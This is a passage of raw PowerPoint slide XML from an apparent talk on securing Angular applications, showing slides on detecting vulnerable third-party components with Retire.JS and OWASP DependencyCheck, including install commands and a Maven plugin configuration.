            <a:endParaRPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" i="1" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Retire.JS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>  : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>://retirejs.github.io/retire.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Features</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>For </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Single Page Applications, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>NodeJS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> apps , traditional </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>webapps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Scan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> files, bower and node </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>modules</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>List vulnerabilities with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>corresponding CVE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>code, a link to the detail (changelog, issue </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>github</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>…)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Usage </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>: command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>line </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>/ grunt/gulp </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>task </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>/ browser </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>plugin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>pentest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> tool </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>plugin</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179512" y="195486"/>
            <a:ext cx="6768752" cy="567000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Secure your Angular Application</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>				</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A9 Mitigation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1600" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1600" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="ZoneTexte 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="21186364">
            <a:off x="6175551" y="1813770"/>
            <a:ext cx="1794081" cy="430887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="3175">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>npm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> install -g </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>retire </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>retire</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2" name="Objet 1"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3963618956"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="683568" y="3435846"/>
          <a:ext cx="776934" cy="270892"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s1080" name="Objet d’environnement du Gestionnaire de liaisons" showAsIcon="1" r:id="rId5" imgW="1967400" imgH="685800" progId="Package">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Objet d’environnement du Gestionnaire de liaisons" showAsIcon="1" r:id="rId5" imgW="1967400" imgH="685800" progId="Package">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name=""/>
                      <p:cNvPicPr/>
                      <p:nvPr/>
                    </p:nvPicPr>
                    <p:blipFill>
                      <a:blip r:embed="rId6"/>
                      <a:stretch>
                        <a:fillRect/>
                      </a:stretch>
                    </p:blipFill>
                    <p:spPr>
                      <a:xfrm>
                        <a:off x="683568" y="3435846"/>
                        <a:ext cx="776934" cy="270892"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                    </p:spPr>
                  </p:pic>
                </p:oleObj>
              </mc:Fallback>
            </mc:AlternateContent>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4301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DAF489CC-3B7A-4DA5-A8C0-4984788D0EC5}" type="slidenum">
              <a:rPr lang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>47</a:t>
            </a:fld>
            <a:endParaRPr lang="nl-NL"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du contenu 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="251520" y="843558"/>
            <a:ext cx="8640960" cy="3672408"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>Detecting known vulnerable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>maven dependencies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="1" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>DependencyCheck</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="1" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" i="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Open source, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>maven</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t> plugin</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Features</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Scan all maven dependencies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Access to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>NVD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>and check </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>CVE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Generate a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>complete report </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>(HTML format) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>vulnerabilities, criticality </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>level, CVE code, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>patched </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>versions </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>–</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Execute the maven command “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>mvn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" i="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>org.owasp:dependency-check-maven:check</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>See</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>usage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>configuration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1200" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1200" b="1" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179512" y="195486"/>
            <a:ext cx="6840760"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800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3rd party components</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1600" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1600" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="ZoneTexte 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="21186364">
            <a:off x="4974493" y="1027700"/>
            <a:ext cx="3722494" cy="2554545"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="3175">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;plugins&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  &lt;plugin&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>groupId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>org.owasp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>groupId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>artifactId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>dependency-check-maven</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>artifactId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>version&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>2.1.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/version&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;executions&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>      &lt;execution&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>        &lt;goals&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>          &lt;goal&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>check</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/goal&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>        &lt;/goals&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
